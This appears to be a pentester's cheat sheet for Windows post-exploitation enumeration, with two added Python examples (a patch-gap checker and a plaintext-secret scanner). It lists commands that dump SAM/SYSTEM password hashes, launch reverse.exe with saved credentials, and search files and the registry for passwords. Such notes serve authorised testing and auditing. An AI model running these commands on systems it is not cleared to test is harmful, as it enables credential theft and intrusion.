🔎Windows Post Enumeration

If winPEAS reports that the SAM or SYSTEM hive is readable, use one of the methods below.

C:\Windows\System32\config\SAM holds the local account password hashes; C:\Windows\System32\config\SYSTEM holds the boot key needed to decrypt them, so both files are required.

On a domain controller, ntds.dit holds the Active Directory database (the domain account hashes) instead.

To extract the hashes (offline, from copies of both hives):

impacket-secretsdump -sam SAM -system SYSTEM local
python2 pwdump.py /tools/SYSTEM /tools/SAM

Each output line has the form user:rid:lmhash:nthash:::. An NT hash starting with 31d6 (31d6cfe0d16ae931b73c59d7e0c089c0) is the hash of an empty string, i.e. the account has a blank password.

Automatic:

wesng (Windows Exploit Suggester - Next Generation) compares the output of systeminfo against the Microsoft patch database and lists vulnerabilities the host is missing patches for; -i filters on impact and --exploit-only keeps only entries with a known public exploit:

python3 wesng.py /tools/systeminfo.txt -i 'Elevation of Privilege' --exploit-only | more
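To show what wesng does with that systeminfo file, here is an added example (not wesng's own code and not from the original page) that parses the OS build and installed hotfix list from systeminfo output and compares it against a table of patches expected for that build, optionally filtered by impact. The systeminfo text and every KB number and impact in the table are constructed placeholders; a real check would load wesng's definition file instead of REQUIRED_KBS.

```python
import re

# Constructed systeminfo output with placeholder KB numbers.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
Network Card(s):           1 NIC(s) Installed.
"""

# Placeholder table: build -> {KB: impact}. Real data would come from the
# wesng definitions; these KB ids and impacts are invented for the example.
REQUIRED_KBS = {
    "19045": {
        "KB0000002": "Elevation of Privilege",
        "KB0000004": "Elevation of Privilege",
        "KB0000005": "Remote Code Execution",
    },
}

FIELD_RE = re.compile(r"^(OS Name|OS Version|System Type):\s+(.*)$")
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_systeminfo(text):
    """Extract OS Name/Version/System Type, the build number and the KB list."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            info[m.group(1)] = m.group(2).strip()
            continue
        m = HOTFIX_RE.search(line)
        if m:
            info["hotfixes"].append(m.group(1))
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    info["build"] = m.group(1) if m else None
    return info


def missing_patches(info, required=REQUIRED_KBS, impact=None):
    """KBs expected for this build that are not installed, optionally by impact."""
    table = required.get(info["build"], {})
    installed = set(info["hotfixes"])
    return sorted(
        kb for kb, kb_impact in table.items()
        if kb not in installed and (impact is None or kb_impact == impact)
    )


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["OS Name"], "build", info["build"])
    print("missing:", missing_patches(info))
    print("missing EoP:", missing_patches(info, impact="Elevation of Privilege"))
```

From the defender's side the same function answers the inverse question: given the patch list your baseline requires, which hosts still report a gap.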

Manual:

Stored credentials and passwords in files:

cmdkey /list
runas /savecred /user:admin C:\Path\to\reverse.exe
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
findstr /SIM /C:"GitLab" *.txt

cmdkey /list shows credentials saved by the current user, and runas /savecred starts a program with one of them. In findstr, /S searches subdirectories, /I ignores case and /M prints only the file names; replace GitLab with any keyword of interest.

System info (cmd):

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Note: the Chimichurri exploit applies to Windows Server 2008 R1 & R2, Windows Vista and Windows 7, so check the OS version first.

Check files with "pass" in the name or a .config extension, recursively (run it in temp or in a suspicious program's directory):

dir /s *pass* == *.config

List all scheduled tasks:

schtasks /query /fo LIST /v

To list all running processes (PowerShell):

get-process

Search registry string values for "password":

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

List installed patches (hotfixes):

wmic qfe

To list disks:

wmic logicaldisk

To check privileges:

whoami /priv

To check group memberships:

whoami /groups

To check users:

net user

Can also check specific user with:

net user administrator

To list local groups (add a group name to see its members):

net localgroup

To view the ARP table:

arp -a

To print the routing table:

route print

For active connections (with the owning PID):

netstat -ano

Search for "password" in files in the current directory tree:

findstr /si password *.txt *.ini *.config
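The findstr searches above (under "Stored credentials" and here) and the reg query searches both hunt for plaintext secrets in configuration. Here is an added example (not from the original page) of the file-side check as a reusable audit script: it walks a directory tree, limits itself to the text-like extensions the findstr commands cover, matches credential-style assignments with a regex and reports path, line and snippet so the owner can remove them. The directory contents it scans are constructed in a temporary folder; the paths and values in them are placeholders.

```python
import os
import re
import shutil
import tempfile

# Extensions the page's findstr commands search.
TEXT_EXTS = {".txt", ".ini", ".cfg", ".config", ".xml", ".ps1", ".yml"}

# Credential-style "key = value" / "key: value" assignments, case-insensitive
# like findstr /I.
SECRET_RE = re.compile(
    r"(password|passwd|pwd|connectionstring|secret)\s*[=:]\s*\S+", re.IGNORECASE
)


def scan_tree(root, keyword_re=SECRET_RE):
    """Return sorted (relative path, line number, stripped line) for every hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTS:
                continue  # skip binaries and unknown types, as the findstr globs do
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if keyword_re.search(line):
                            rel = os.path.relpath(path, root).replace(os.sep, "/")
                            hits.append((rel, lineno, line.strip()))
            except OSError:
                continue  # unreadable file: report nothing rather than abort
    return sorted(hits)


def make_sample_tree():
    """Create a constructed directory tree with placeholder config files."""
    root = tempfile.mkdtemp(prefix="credscan_")
    os.makedirs(os.path.join(root, "app"))
    samples = {
        "app/web.config": '<add name="Db" connectionString="Server=db;Password=Example123;" />\n',
        "app/settings.ini": "[auth]\npassword = hunter2\n",
        "notes.txt": "no secrets here\n",
        "tool.exe": "binary data password=ignored\n",  # wrong extension, skipped
    }
    for rel, content in samples.items():
        with open(os.path.join(root, *rel.split("/")), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def scan_sample():
    """Build the sample tree, scan it and clean up; returns the hit list."""
    root = make_sample_tree()
    try:
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, lineno, snippet in scan_sample():
        print(f"{rel}:{lineno}: {snippet}")
```

Point scan_tree at a real application directory to get the same report; extend SECRET_RE with product-specific keywords (the page's GitLab example) rather than lowering the extension filter, which mostly adds noise.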

Check firewall and AV:

To check Windows Defender:

sc query windefend

To list all services (AV/EDR products usually appear here):

sc queryex type= service

To check the firewall (the netsh firewall context is the legacy one; advfirewall is the current one):

netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
